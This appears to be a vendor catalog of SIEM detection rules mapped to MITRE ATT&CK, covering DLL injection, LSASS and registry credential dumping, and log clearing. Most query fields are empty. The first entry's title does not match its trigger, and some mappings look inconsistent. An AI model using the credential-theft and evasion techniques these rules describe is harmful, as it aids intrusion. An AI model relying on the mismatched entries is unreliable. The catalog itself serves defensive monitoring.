MITRE ATT&CK Analytics
LP_Successful Microsoft 365 Login with Reconnaissance User Agents
Trigger Condition: Usage of the CreateRemoteThread API and LoadLibrary functions to inject a DLL into a process.
ATT&CK Category: Defense Evasion
ATT&CK Tag: Dynamic-link Library Injection
ATT&CK ID: T1055.001
Minimum Log Source Requirement: Windows Sysmon
Query:
norm_id=WindowsSysmon event_id=8 start_module="*\kernel32.dll" start_function="LoadLibraryA" -user IN EXCLUDED_USERSLP_Command Obfuscation via Character Insertion
Trigger Condition: Command obfuscation of command prompt by character insertion is detected.
ATT&CK Category: Execution
ATT&CK Tag: Command and Scripting Interpreter, Windows Command Shell
ATT&CK ID: T1059, T1059.003
Minimum Log Source Requirement: Windows Sysmon
Query:
label="Process" label=Create parent_process='*\cmd.exe' parent_command="cmd*/c*"
| norm on parent_command <command_match:'[^\w](s\^+e\^*t|s\^*e\^+t)[^\w]'>
| filter command_match=*LP_Credential Access via Input Prompt Detected
Trigger Condition: A command executed to capture user input to obtain the credentials is detected.
ATT&CK Category: Credential Access, Collection
ATT&CK Tag: Input Capture, GUI Input Capture
ATT&CK ID: T1056, T1056.002
Minimum Log Source Requirement: Windows, Windows Sysmon
Query:
LP_Credential Dump Tools Dropped Files Detected
Trigger Condition: Creation of files with a well-known filename, or parts of credential dump software or files produced by them.
ATT&CK Category: Credential Access
ATT&CK Tag: LSASS Memory, Security Account Manager, NTDS, LSA Secrets, Cached Domain Credentials
ATT&CK ID: T1003.001, T1003.002, T1003.003, T1003.004, T1003.005
Minimum Log Source Requirement: Windows Sysmon
Query:
LP_Credential Dumping with ImageLoad Detected
Trigger Condition: This alert is triggered whenever attempts by adversaries to dump credentials using DLL images are detected.
ATT&CK Category: Credential Access
ATT&CK Tag: OS Credential Dumping
ATT&CK ID: T1003
Minimum Log Source Requirement: Windows Sysmon, Windows
Query:
LP_Registry Enumeration for credentials Detected
Trigger Condition: This alert is triggered whenever adversaries search the registry of compromised systems to find and obtain insecurely stored credentials.
ATT&CK Category: Credential Access
ATT&CK Tag: Unsecured Credentials, Credentials in Registry
ATT&CK ID: T1552, T1552.002
Minimum Log Source Requirement: Windows Sysmon, Windows
Query:
LP_Default Account privilege elevation followed by restoration of the previous account state
Trigger Condition: A user is added to a group or assigned privilege, followed by restoration or removal from those rights.
ATT&CK Category: Persistence, Privilege Escalation
ATT&CK Tag: Account Manipulation, Exploitation for Privilege Escalation
ATT&CK ID: T1098, T1068
Minimum Log Source Requirement: Windows
Query:
LP_Default Blocked Inbound Traffic followed by Allowed Event
Trigger Condition: Blocked inbound traffic followed by allowed traffic is detected.
ATT&CK Category: Command and Control
ATT&CK Tag: Proxy
ATT&CK ID: T1090
Minimum Log Source Requirement: Firewall, IDS, IPS
Query:
LP_Default Brute Force Attack Successful
Trigger Condition: Five failed users login attempts followed by a successful login from the same user within five minutes is detected.
ATT&CK Category: Credential Access
ATT&CK Tag: Brute Force
ATT&CK ID: T1110
Minimum Log Source Requirement: Windows, AWS, Firewall, WAF, Unix
Query:
LP_Default CPU Usage Status
Trigger Condition: The use of CPU exceeds 90%.
ATT&CK Category: N/A
ATT&CK Tag: N/A
ATT&CK ID: N/A
Minimum Log Source Requirement: Logpoint
Query:
LP_Default Device Stopped Sending Logs for Half an Hour
Trigger Condition: A device that has not sent logs for half an hour or more is detected.
ATT&CK Category: Impact
ATT&CK Tag: Service Stop
ATT&CK ID: T1489
Minimum Log Source Requirement: Firewall, IDS, IPS, Proxy Server, Windows, Unix
Query:
LP_Default DNS Tunneling Detection - Query Size
Trigger Condition: Traffic with more than 64 characters in Application Layer Protocol and DNS is detected.
ATT&CK Category: Command and Control
ATT&CK Tag: Application Layer Protocol, DNS, Dynamic Resolution, Domain Generation Algorithms
ATT&CK ID: T1071,T1071.004,T1568,T1568.002
Minimum Log Source Requirement: Firewall, IDS, IPS, Web Server, DNS Server
Query:
LP_Default Excessive Blocked Connections
Trigger Condition: 50 blocked or denied connections are observed from the same source within a minute.
ATT&CK Category: Impact, Command and Control
ATT&CK Tag: Network Denial of Service, Endpoint Denial of Service, Proxy
ATT&CK ID: T1498, T1499, T1090
Minimum Log Source Requirement: Firewall, IDS/IPS
Query:
LP_Default File Association Changed
Trigger Condition: Adversaries establish persistence and/or elevate privileges by executing malicious content triggered by a file type association.
ATT&CK Category: Persistence
ATT&CK Tag: Event Triggered Execution, Change Default File Association
ATT&CK ID: T1546, T1546.001
Minimum Log Source Requirement: Windows Sysmon
Query:
LP_Default Guest Account Added to Administrative Group
Trigger Condition: A guest account is added to security group management.
ATT&CK Category: Credential Access, Persistence, Privilege Escalation, Defense Evasion, Initial Access
ATT&CK Tag: Account Manipulation, Abuse Elevation Control Mechanism, Bypass User Access Control, Valid Accounts
ATT&CK ID: T1098, T1548, T1548.002, T1078
Minimum Log Source Requirement: Windows
Query:
LP_Default IRC connection
Trigger Condition: The IRC connection is detected. For this alert to work, you must update ALERT_IRC_PORT list with possible IRC ports.
ATT&CK Category: Command and Control, Discovery
ATT&CK Tag: Proxy, Network Service Scanning
ATT&CK ID: T1090, T1046
Minimum Log Source Requirement: Firewall, IDS, IPS, Web Server
Query:
LP_Default Malware Detected
Trigger Condition: A malware or a virus is detected in the system.
ATT&CK Category: Resource Development
ATT&CK Tag: Develop Capabilities, Malware
ATT&CK ID: T1587, T1587.001
Minimum Log Source Requirement: Antivirus
Query:
LP_Default Malware not Cleaned
Trigger Condition: A malware clean events including deletion, removal, and quarantine, is followed by detecting the same malware in the same host.
ATT&CK Category: Discovery, Defense Evasion
ATT&CK Tag: Network Service Scanning,Exploitation for Defense Evasion,Software Discovery, Security Software Discovery
ATT&CK ID: T1046, T1211, T1518, T1518.001
Minimum Log Source Requirement: Antivirus
Query:
LP_Default Malware Removed
Trigger Condition: Removal of malware or a virus from the system is detected.
ATT&CK Category: Defense Evasion
ATT&CK Tag: Indicator Removal on Host, Obfuscated Files or Information, Indicator Removal from Tools
ATT&CK ID: T1070, T1027, T1027.005
Minimum Log Source Requirement: Antivirus
Query:
LP_Default Memory Usage Status
Trigger Condition: Physical memory usage exceeds 90% of the total memory available is detected.
ATT&CK Category: -
ATT&CK Tag: -
ATT&CK ID: -
Minimum Log Source Requirement: Logpoint
Query:
LP_Default Network Configuration Change on Network Device
Trigger Condition: A change in the core network event source, such as a router or switch, is detected.
ATT&CK Category: Persistence, Credential Access, Defense Evasion, Privilege Escalation
ATT&CK Tag: Modify Existing Service, Account Manipulation, Abuse Elevation Control Mechanism, Bypass User Access Control, Impair Defenses, Indicator Blocking, Modify Registry, Exploitation for Privilege Escalation
ATT&CK ID: T1098, T1548, T1562, T1562.006, T1112, T1068
Minimum Log Source Requirement: Firewall, IDS, IPS
Query:
LP_Default Port Scan Detected
Trigger Condition: Connection from multiple ports of a public IP address to a destination address is detected.
ATT&CK Category: -
ATT&CK Tag: -
ATT&CK ID: -
Minimum Log Source Requirement: Firewall, IDS, IPS, Webserver
Query:
LP_Default Possible Cross Site Scripting Attack Detected
Trigger Condition: The script tag indicating the XSS attack is detected in the URL.
ATT&CK Category: Initial Access
ATT&CK Tag: Exploiting Public-Facing Application
ATT&CK ID: T1190
Minimum Log Source Requirement: Firewall, IDS, IPS, Web Server
Query:
LP_Default Possible Non-PCI Compliant Inbound Network Traffic Detected
Trigger Condition: An inbound connection is detected in secure devices over non-compliant ports as specified by PCI compliance practices. For this alert to work, you must update the list NON_PCI_COMPLIANT_PORT.
ATT&CK Category: Command and Control
ATT&CK Tag: Proxy
ATT&CK ID: T1090
Minimum Log Source Requirement: Firewall, IDS/IPS
Query:
LP_Default Possible SQL Injection Attack
Trigger Condition: SQL character injection in the input field of a web application is detected.
ATT&CK Category: Initial Access
ATT&CK Tag: Exploit Public-Facing Application
ATT&CK ID: T1190
Minimum Log Source Requirement: Firewall, IDS, IPS, Web Server
Query:
LP_Default Possible System Instability State Detected
Trigger Condition: The instability of a system is detected. For example, a system shut down or restarts more than five times within ten minutes. A correlation rule is designed to detect if a system has become unstable.
ATT&CK Category: Impact
ATT&CK Tag: System Shutdown/Reboot
ATT&CK ID: T1529
Minimum Log Source Requirement: OS
Query:
LP_Default PowerSploit and Empire Schtasks Persistence
Trigger Condition: Creation of a schtask via PowerSploit or Empire default configuration.
ATT&CK Category: Execution, Persistence, Privilege Escalation
ATT&CK Tag: Scheduled Task, PowerShell
ATT&CK ID: T1053.005, T1059.001
Minimum Log Source Requirement: Windows Sysmon, Windows
Query:
LP_Default Successful Login outside Normal Hour
Trigger Condition: Successful user login beyond regular office hour is detected. You can adjust the regular work hour according to your company.
ATT&CK Category: Defense Evasion, Persistence, Privilege Escalation, Initial Access
ATT&CK Tag: Valid Accounts
ATT&CK ID: T1078
Minimum Log Source Requirement: Windows
Query:
LP_Default Successful Login Using a Default Account
Trigger Condition: Successful login attempts using a vendor default account is detected. The alert is essential for those organizations employing Payment Card Industry (PCI) Compliance.
ATT&CK Category: Defense Evasion, Persistence, Privilege Escalation, Initial Access
ATT&CK Tag: Valid Accounts, Default Accounts
ATT&CK ID: T1078, T1078.001
Minimum Log Source Requirement: Windows
Query:
LP_Default System Time Change
Trigger Condition: The system time is changed or when Logpoint command /opt/immune/installed/system/root_actions/*_ntp.sh is executed.
ATT&CK Category: Persistence, Impact
ATT&CK Tag: Modify Existing Service, Data Destruction
ATT&CK ID: T1485
Minimum Log Source Requirement: Windows
Query:
LP_Default TCP Probable SynFlood Attack
Trigger Condition: Security devices detect ten TCP Syn flood events within a minute.
ATT&CK Category: Impact
ATT&CK Tag: Endpoint Denial of Service
ATT&CK ID: T1499
Minimum Log Source Requirement: Firewall, IDS, IPS
Query:
LP_Default Unusual Number of Failed Vendor User Login
Trigger Condition: Failed user logins using default credentials for more than 10 times are detected. For this alert to work, you must update the list DEFAULT_USERS with default vendor user names.
ATT&CK Category: Defense Evasion, Persistence, Privilege Escalation, Initial Access
ATT&CK Tag: Valid Accounts, Default Accounts
ATT&CK ID: T1078, T1078.001
Minimum Log Source Requirement: Windows
Query:
LP_HandleKatz Duplicating LSASS Handle
Trigger Condition: HandleKatz tool directly opening LSASS process to duplicate its handle is detected.
ATT&CK Category: Execution, Credential Access
ATT&CK Tag: LSASS Memory, Native API
ATT&CK ID: T1003.001, T1106
Minimum Log Source Requirement: Windows Sysmon
Query:
LP_PowerShell Execution Policy Modification Detected
Trigger Condition: Registry value for the PowerShell execution policy is changed.
ATT&CK Category: Execution, Defense Evasion
ATT&CK Tag: PowerShell, Modify Registry
ATT&CK ID: T1059.001, T1112
Minimum Log Source Requirement: Windows Sysmon
Query:
LP_Devtoolslauncher Executes Specified Binary
Trigger Condition: Usage of devtoolslauncher to execute other binaries. Adversaries attempt to bypass process or signature-based defences by proxying the execution of malicious content with signed binaries using devtoolslauncher and LaunchForDeploy commands.
ATT&CK Category: Defense Evasion
ATT&CK Tag: System Binary Proxy Execution
ATT&CK ID: T1218
Minimum Log Source Requirement: Windows Sysmon, Windows
Query:
LP_DHCP Callout DLL Installation Detected
Trigger Condition: Installation of a Callout DLL via CalloutDlls and CalloutEnabled parameters in the registry, used to execute code in the context of the DHCP server is detected.
ATT&CK Category: Defense Evasion
ATT&CK Tag: Hijack Execution Flow, DLL Side-Loading, Modify Registry
ATT&CK ID: T1574, T1574.002, T1112
Minimum Log Source Requirement: Windows Sysmon
Query:
LP_DHCP Server Error Failed Loading the CallOut DLL
Trigger Condition: DHCP server error in which a specified Callout DLL in registry cannot be loaded.
ATT&CK Category: Defense Evasion
ATT&CK Tag: Hijack Execution Flow, DLL Side-Loading
ATT&CK ID: T1574, T1574.002
Minimum Log Source Requirement: Windows Sysmon
Query:
LP_DHCP Server Loaded the CallOut DLL
Trigger Condition: Specified Callout DLL in the registry loaded by the DHCP server. Adversaries attempt to run their specified DLL through the DHCP server to achieve their objectives.
ATT&CK Category: Defense Evasion
ATT&CK Tag: DLL Side-Loading
ATT&CK ID: T1574.002
Minimum Log Source Requirement: Windows
Query:
LP_Disable of ETW Trace
Trigger Condition: Usage of a command that clears or disables any Event Tracing for Windows (ETW) trace log. Adversaries can temporarily or permanently cease logging flow without generating any additional event-clear log entries from this tactic.
ATT&CK Category: Defense Evasion
ATT&CK Tag: Indicator Blocking, Indicator Removal
ATT&CK ID: T1562.006, T1070
Minimum Log Source Requirement: Windows Sysmon, Windows, PowerShell
Query:
LP_Execution of Base64 Encoded Command Using IEX
Trigger Condition: This alert detects the usage of the “IEX” (Invoke-Expression) cmdlet to execute encoded PowerShell commands.
ATT&CK Category: Execution
ATT&CK Tag: PowerShell
ATT&CK ID: T1059.001
Minimum Log Source Requirement: Windows Sysmon, Windows, PowerShell
Query:
LP_Discovery via PowerSploit Recon Module
Trigger Condition: This alert is triggered whenever execution via PowerSploit Reconnaissance module is detected.
ATT&CK Category: Execution
ATT&CK Tag: PowerShell
ATT&CK ID: T1059.001
Minimum Log Source Requirement: Windows
Query:
LP_DLL Load via LSASS Detected
Trigger Condition: A DLL loaded through an undocumented Registry key via the LSASS process.
ATT&CK Category: Persistence
ATT&CK Tag: Boot or Logon Autostart Execution, LSASS Driver
ATT&CK ID: T1547, T1547.008
Minimum Log Source Requirement: Windows Sysmon
Query:
LP_DNS Server Error Failed Loading the ServerLevelPluginDLL
Trigger Condition: Application Layer Protocol and DNS server error where a specified plugin DLL in the registry connot be loaded.
ATT&CK Category: Defense Evasion
ATT&CK Tag: Hijack Execution Flow, DLL Side-Loading
ATT&CK ID: T1574, T1574.002
Minimum Log Source Requirement: DNS Server
Query:
LP_DNS ServerLevelPluginDll Install
Trigger Condition: This alert is triggered whenever it detects the installation of a plugin DLL via ServerLevelPluginDll parameter in Registry,which can be used to execute code in context of the Application Layer Protocol, DNS server. A restart is required to have the change in effect.
ATT&CK Category: Defense Evasion
ATT&CK Tag: Modify Registry, DLL Side-Loading
ATT&CK ID: T1112, T1574.002
Minimum Log Source Requirement: Windows Sysmon
Query:
LP_Domain Trust Discovery Detected
Trigger Condition: Adversaries attempt to gather information on domain trust relationships is detected. Domain trust is a relationship between two domains that allows users in one domain to be authenticated in the other domain.
ATT&CK Category: Discovery
ATT&CK Tag: Domain Trust Discovery
ATT&CK ID: T1482
Minimum Log Source Requirement: Windows Sysmon, Windows
Query:
LP_dotNET DLL Loaded Via Office Applications
Trigger Condition: Assembly of DLL loaded by the Office Product.
ATT&CK Category: Execution
ATT&CK Tag: Malicious File
ATT&CK ID: T1204.002
Minimum Log Source Requirement: Windows Sysmon
Query:
LP_DPAPI Domain Backup Key Extraction Detected
Trigger Condition: Tools extracting the LSA secret DPAPI domain backup key from domain controllers.
ATT&CK Category: Credential Access
ATT&CK Tag: LSA Secrets
ATT&CK ID: T1003.004
Minimum Log Source Requirement: Windows
Query:
LP_DPAPI Domain Master Key Backup Attempt
Trigger Condition: An attempt to backup Data Protection API (DPAPI) master key is detected.
ATT&CK Category: Credential Access
ATT&CK Tag: LSA Secrets
ATT&CK ID: T1003.004
Minimum Log Source Requirement: Windows
Query:
LP_Dridex Process Pattern Detected
Trigger Condition: A typical dridex process patterns are detected.
ATT&CK Category: Defense Evasion, Privilege , Discovery
ATT&CK Tag: Process Injection, System Owner/User Discovery, Network Share Discovery
ATT&CK ID: T1055, T1033, T1135
Minimum Log Source Requirement: Windows Sysmon, Windows
Query:
LP_Droppers Exploiting CVE-2017-11882 Detected
Trigger Condition: The exploitation using CVE-2017-11882 to start EQNEDT32.EXE and other sub-processes like mshta.exe are detected.
ATT&CK Category: Defense Evasion
ATT&CK Tag: Exploitation for Defense Evasion
ATT&CK ID: T1211
Minimum Log Source Requirement: Windows Sysmon
Query:
LP_Drupal Arbitrary Code Execution Detected
Trigger Condition: This alert is triggered whenever exploitation of arbitrary code execution vulnerability (CVE-2018-7600)in Drupal is detected.
ATT&CK Category: Initial Access
ATT&CK Tag: Exploit Public-Facing Application
ATT&CK ID: T1190
Minimum Log Source Requirement: Firewall, IDS, IPS, Web Server
Query:
LP_Elevated Command Prompt Activity by Non-Admin User Detected
Trigger Condition: Execution of an elevated command prompt by a non-admin user. Adversaries use this technique to execute commands or scripts that require a higher privilege than the regular users.
ATT&CK Category: Execution
ATT&CK Tag: Command and Scripting Interpreter
ATT&CK ID: T1059
Minimum Log Source Requirement: Windows
Query:
LP_EMC Possible Ransomware Detection
Trigger Condition: Suspicious data activity affecting more than 200 files or in-house baseline is detected.
ATT&CK Category: Impact
ATT&CK Tag: Data Encrypted for Impact, Data Destruction, Proxy
ATT&CK ID: T1486, T1485, T1090
Minimum Log Source Requirement: EMC
Query:
LP_Empire PowerShell Launch Parameters
Trigger Condition: Suspicious PowerShell command line parameters used in Empire are detected.
ATT&CK Category: Execution
ATT&CK Tag: Command and Scripting Interpreter, PowerShell
ATT&CK ID: T1059, T1059.001
Minimum Log Source Requirement: Windows Sysmon, Windows
Query:
LP_Enabled User Right in AD to Control User Objects
Trigger Condition: Logpoint detects a scenario where if a user is assigned the SeEnableDelegation Privilege right in Active Directory, they will be allowed to control other Active Directory user’s objects.
ATT&CK Category: Privilege Escalation, Initial Access, Persistence, Defense Evasion
ATT&CK Tag: Valid Accounts
ATT&CK ID: T1078
Minimum Log Source Requirement: Windows
Query:
LP_Encoded PowerShell Command Detected
Trigger Condition: Execution of encoded Command and Scripting Interpreter and PowerShell commands are detected.
ATT&CK Category: Execution
ATT&CK Tag: PowerShell
ATT&CK ID: T1059.001
Minimum Log Source Requirement: Windows Sysmon, Windows
Query:
LP_Eventlog Cleared Detected
Trigger Condition: One of the Windows Event logs been cleared is detected. Adversaries can use this technique to remove the traces of intrusion.
ATT&CK Category: Defense Evasion
ATT&CK Tag: Clear Windows Event Logs
ATT&CK ID: T1070.001
Minimum Log Source Requirement: Windows
Query:
LP_Executables Stored in OneDrive
Trigger Condition: A user stores files that are executable in OneDrive.
ATT&CK Category: Defense Evasion
ATT&CK Tag: Masquerading
ATT&CK ID: T1036
Minimum Log Source Requirement: Office365
Query:
LP_Execution in Non-Executable Folder Detected
Trigger Condition: Process creation from an uncommon directory.
ATT&CK Category: Defense Evasion
ATT&CK Tag: Masquerading
ATT&CK ID: T1036
Minimum Log Source Requirement: Windows Sysmon, Windows
Query:
LP_Execution in Webserver Root Folder Detected
Trigger Condition: Execution of a suspicious program in a web service root folder (filter out false positives).
ATT&CK Category: Persistence
ATT&CK Tag: Server Software Component, Web Shell
ATT&CK ID: T1505, T1505.003
Minimum Log Source Requirement: Windows Sysmon, Windows
Query:
LP_Execution of Renamed PaExec Detected
Trigger Condition: Execution of renamed paexec via imphash and executable product string.
ATT&CK Category: Defense Evasion
ATT&CK Tag: Indirect Command Execution
ATT&CK ID: T1202
Minimum Log Source Requirement: Windows Sysmon
Query:
LP_Execution via Control Panel Items
Trigger Condition: Execution of binary via Signed Binary Proxy Execution, Control Panel items.
ATT&CK Category: Defense Evasion
ATT&CK Tag: Control Panel
ATT&CK ID: T1218.002
Minimum Log Source Requirement: Windows Sysmon, Windows
Query:
LP_Execution via HTA using IE JavaScript Engine Detected
Trigger Condition: Execution of an HTA (HTML Application) file using the Internet Explorer JavaScript engine.
ATT&CK Category: Defense Evasion
ATT&CK Tag: Mshta
ATT&CK ID: T1218.005
Minimum Log Source Requirement: Windows Sysmon
Query:
LP_Suspicious Fsutil Invocation
Trigger Condition: Execution of Fsutil with Createjournal, Deletejournal or setZeroData command-line argument.
ATT&CK Category: Defense Evasion, Impact
ATT&CK Tag: Indicator Removal, Data Destruction
ATT&CK ID: T1070, T1485
Minimum Log Source Requirement: Windows Sysmon, Windows
Query:
LP_High Number of Process Termination
Trigger Condition: When more than ten processes are terminated. In Microsoft Windows, processes can be terminated using task kill, service stop, and service delete. Adversaries can use this technique to kill, stop, or delete services or processes that could prevent payload execution.
ATT&CK Category: Impact
ATT&CK Tag: Service Stop
ATT&CK ID: T1489
Minimum Log Source Requirement: Windows Sysmon, Windows
Query:
LP_Execution via Windows Scripting Host Component Detected
Trigger Condition: Execution of a script using a system’s Windows Scripting Host (WSH) component. WSH is a Microsoft technology that allows users to run scripts and automate tasks on Windows systems.
ATT&CK Category: Execution
ATT&CK Tag: Command and Scripting Interpreter
ATT&CK ID: T1059
Minimum Log Source Requirement: Windows Sysmon
Query:
LP_Exim MTA Remote Code Execution Vulnerability Detected
Trigger Condition: Remote code execution vulnerability in Exim MTA is detected.
ATT&CK Category: Discovery
ATT&CK Tag: Network Service Scanning, Software Discovery, Security Software Discovery
ATT&CK ID: T1046, T1518, T1518.001
Minimum Log Source Requirement: Vulnerability Management
Query:
LP_Exim Remote Command Execution Detected
Trigger Condition: Remote command execution in Exim is detected (CVE-2019-10149 is detected).
ATT&CK Category: Execution
ATT&CK Tag: Exploitation for Client Execution
ATT&CK ID: T1203
Minimum Log Source Requirement: Mail Server
Query:
LP_Existing Service Modification Detected
Trigger Condition: A modification of an existing service via the sc.exe system utility is detected.
ATT&CK Category: Persistence, Privilege Escalation
ATT&CK Tag: Create or Modify System Process, Windows Service
ATT&CK ID: T1543, T1543.003
Minimum Log Source Requirement: Windows Sysmon, Windows
Query:
LP_Fail2ban IP Banned
Trigger Condition: A client’s IP address is banned after exceeding the limit for failed authentications.
ATT&CK Category: Credential Access, Persistence
ATT&CK Tag: Brute Force, Valid Accounts, Account Manipulation
ATT&CK ID: T1110, T1078, T1098
Minimum Log Source Requirement: Fail2ban
Query:
LP_File Creation by PowerShell Detected
Trigger Condition: Creation of a new file using PowerShell on a system. Adversaries may use PowerShell to create new files, as a way to drop and execute malicious payloads, or to store data for later retrieval.
ATT&CK Category: Execution
ATT&CK Tag: PowerShell
ATT&CK ID: T1059.001
Minimum Log Source Requirement: Windows Sysmon
Query:
LP_File Deletion Detected
Trigger Condition: Adversaries delete files to erase the traces of the intrusion.
ATT&CK Category: Defense Evasion
ATT&CK Tag: Indicator Removal on Host, File Deletion
ATT&CK ID: T1070, T1070.004
Minimum Log Source Requirement: Windows Sysmon
Query:
LP_File or Folder Permissions Modifications
Trigger Condition: Modifications to file or folder permissions are detected. Permissions control access to files and directories and determine which users and processes can read, write, or execute them.
ATT&CK Category: Defense Evasion
ATT&CK Tag: Windows File and Directory Permissions Modification
ATT&CK ID: T1222.001
Minimum Log Source Requirement: Windows Sysmon, Windows
Query:
LP_File System Permissions Weakness
Trigger Condition: A weakness in the file system permissions on a system is detected.
ATT&CK Category: Persistence, Privilege Escalation, Defense Evasion
ATT&CK Tag: Hijack Execution Flow, Services File Permissions Weakness
ATT&CK ID: T1574,T1574.010
Minimum Log Source Requirement: Windows Sysmon
Query:
LP_Firewall Disabled via Netsh Detected
Trigger Condition: netsh commands that turn off the Windows firewall are detected. Adversaries disable the firewall through netsh to bypass restrictions allowing connections with C&C servers.
ATT&CK Category: Defense Evasion
ATT&CK Tag: Disable or Modify System Firewall
ATT&CK ID: T1562.004
Minimum Log Source Requirement: Windows Sysmon, Windows
Query:
LP_First Time Seen Remote Named Pipe
Trigger Condition: The alert rule excludes the named pipes accessible remotely and notifies on new cases.
ATT&CK Category: Lateral Movement
ATT&CK Tag: Remote Services
ATT&CK ID: T1021
Minimum Log Source Requirement: Windows
Query:
LP_FirstClass Failed Login Attempt
Trigger Condition: A user or a gateway attempts to log in with an incorrect password.
ATT&CK Category: Defense Evasion, Persistence, Privilege Escalation, Initial Access
ATT&CK Tag: Exploitation for Credential Access, Exploitation for Privilege Escalation, Brute Force
ATT&CK ID: T1212, T1068, T1110
Minimum Log Source Requirement: Firstclass
Query:
LP_FirstClass Failed Password Change Attempt
Trigger Condition: A user fails to change their password.
ATT&CK Category: Credential Access, Persistence
ATT&CK Tag: Account Manipulation, Exploitation for Credential Access, Exploitation for Privilege Escalation
ATT&CK ID: T1098, T1212, T1068
Minimum Log Source Requirement: Firstclass
Query:
LP_Formbook Process Creation Detected
Trigger Condition: This alert is triggered whenever it detects Formbook like process executions that inject code into a set of files in the System32 folder, which executes a special command line to delete the dropper from the AppData Temp folder.
ATT&CK Category: Resource Development
ATT&CK Tag: Malware
ATT&CK ID: T1587.001
Minimum Log Source Requirement: Windows Sysmon, Windows
Query:
LP_FortiGate Admin Login Disable
Trigger Condition: The administrator login is disabled in the system.
ATT&CK Category: Impact, Credential Access, Persistence
ATT&CK Tag: Account Access Removal, Account Manipulation
ATT&CK ID: T1531, T1098
Minimum Log Source Requirement: Fortigate
Query:
LP_FortiGate Anomaly
Trigger Condition: An anomaly in the system is detected.
ATT&CK Category: Discovery
ATT&CK Tag: Network Service Scanning
ATT&CK ID: T1046
Minimum Log Source Requirement: Fortigate
Query:
LP_FortiGate Antivirus Botnet Warning
Trigger Condition: A botnet warning from antivirus is detected.
ATT&CK Category: Command and Control, Impact
ATT&CK Tag: Proxy, Network Denial of Service
ATT&CK ID: T1090, T1498
Minimum Log Source Requirement: Fortigate
Query:
LP_FortiGate Antivirus Scan Engine Load Failed
Trigger Condition: Antivirus Scan Engine Load Failure is detected.
ATT&CK Category: Defense Evasion
ATT&CK Tag: Impair Defenses, Impair Defenses, Disable or Modify Tools
ATT&CK ID: T1562, T1562.001
Minimum Log Source Requirement: Fortigate
Query:
LP_FortiGate Attack
Trigger Condition: An attack in the system is detected.
ATT&CK Category: Impact
ATT&CK Tag: Network Denial of Service
ATT&CK ID: T1498
Minimum Log Source Requirement: Fortigate
Query:
LP_FortiGate Critical Events
Trigger Condition: Critical events in the system are detected.
ATT&CK Category: Discovery
ATT&CK Tag: Network Service Scanning
ATT&CK ID: T1046
Minimum Log Source Requirement: Fortigate
Query:
LP_FortiGate Data Leak Protection
Trigger Condition: An attempt to data leak is detected.
ATT&CK Category: Exfiltration
ATT&CK Tag: Automated Exfiltration
ATT&CK ID: T1020
Minimum Log Source Requirement: Fortigate
Query:
LP_FortiGate IPS Events
Trigger Condition: An intrusion attempt is detected in the system.
ATT&CK Category: Discovery, Defense Evasion
ATT&CK Tag: Network Service Scanning, Exploitation for Defense Evasion
ATT&CK ID: T1046, T1211
Minimum Log Source Requirement: Fortigate
Query:
LP_FortiGate Malicious URL Attack
Trigger Condition: A malicious attack in a system is detected. This alert rule is valid only for FortiOS V6.0.4.
ATT&CK Category: Initial Access
ATT&CK Tag: Phishing, Spearphishing Link
ATT&CK ID: T1566, T1566.002
Minimum Log Source Requirement: Fortigate
Query:
LP_FortiGate Virus
Trigger Condition: A virus attack is detected.
ATT&CK Category: Discovery, Defense Evasion
ATT&CK Tag: Network Service Scanning, Exploitation for Defense Evasion
ATT&CK ID: T1046, T1211
Minimum Log Source Requirement: Fortigate
Query:
LP_FortiGate VPN SSL User Login Failed
Trigger Condition: A VPN SSL login failure is detected.
ATT&CK Category: Initial Access, Credential Access
ATT&CK Tag: Valid Accounts, Brute Force
ATT&CK ID: T1078, T1110
Minimum Log Source Requirement: Fortigate
Query:
LP_FSecure File Infection
Trigger Condition: An infected file is detected.
ATT&CK Category: Discovery
ATT&CK Tag: Network Service Scanning, File and Directory Discovery
ATT&CK ID: T1046, T1083
Minimum Log Source Requirement: Fsecure Gatekeeper
Query:
LP_FSecure Virus Detection
Trigger Condition: Virus alert is detected while scanning.
ATT&CK Category: Discovery, Defense Evasion
ATT&CK Tag: Network Service Scanning, Exploitation for Defense Evasion
ATT&CK ID: T1046, T1211
Minimum Log Source Requirement: Fsecure
Query:
LP_GAC DLL Loaded Via Office Applications Detected
Trigger Condition: GAC DLL loaded by an Office Product is detected.
ATT&CK Category: Execution
ATT&CK Tag: Malicious File
ATT&CK ID: T1204.002
Minimum Log Source Requirement: Windows Sysmon
Query:
LP_Generic Password Dumper Activity on LSASS Detected
Trigger Condition: Process handle on LSASS process with access mask is detected.
ATT&CK Category: Credential Access
ATT&CK Tag: Credential Dumping
ATT&CK ID: T1003
Minimum Log Source Requirement: Windows
Query:
LP_Grabbing Sensitive Hives via Reg Utility
Trigger Condition: This alert is triggered whenever sensitive Windows hives (SYSTEM, SAM, SECURITY) is accessed via Reg utility.
ATT&CK Category: Credential Access
ATT&CK Tag: LSA Secrets, Cached Domain Credentials, Credentials in Registry
ATT&CK ID: T1003.004, T1003.005, T1552.002
Minimum Log Source Requirement: Windows Sysmon, Windows
Query:
LP_Hacktool Ruler Detected
Trigger Condition: Sensepost uses a Hacktool ruler.
ATT&CK Category: Discovery, Execution
ATT&CK Tag: Account Discovery, Use Alternate Authentication Material, Pass the Hash, Email Collection, Command-Line Interface + ATT&CK ID: T1087, T1550, T1550.002, T1114, T1059
Minimum Log Source Requirement: Windows
Query:
LP_HH Execution Detected
Trigger Condition: Use of hh.exe to execute local Compiled HTML Help (CHM) or remote CHM files.
ATT&CK Category: Defense Evasion, Initial Access
ATT&CK Tag: Compiled HTML File, Spearphishing Attachment
ATT&CK ID: T1218.001, T1566.001
Minimum Log Source Requirement: Windows Sysmon, Windows
Query:
LP_Hiding Files with Attrib Detected
Trigger Condition: Use of attrib.exe to hide files from users.
ATT&CK Category: Defense Evasion
ATT&CK Tag: Hide Artifacts, Hidden Files and Directories
ATT&CK ID: T1564, T1564.001
Minimum Log Source Requirement: Windows Sysmon, Windows
Query:
LP_In-memory PowerShell Detected
Trigger Condition: Loading of System.Management.Automation.dll by other processes than PowerShell.
ATT&CK Category: Execution
ATT&CK Tag: PowerShell
ATT&CK ID: T1059.001
Minimum Log Source Requirement: Windows Sysmon
Query:
LP_Indicator Blocking - Driver Unloaded
Trigger Condition: Adversaries blocks indicators or events captured by sensors from being gathered and analyzed.
ATT&CK Category: Defense Evasion
ATT&CK Tag: Impair Defenses, Indicator Blocking
ATT&CK ID: T1562, T1562.006
Minimum Log Source Requirement: Windows Sysmon
Query:
LP_Indicator Blocking - Sysmon Registry Edited
Trigger Condition: An indicator blocking via registry editing is detected.
ATT&CK Category: Defense Evasion
ATT&CK Tag: Impair Defenses, Indicator Blocking
ATT&CK ID: T1562, T1562.006
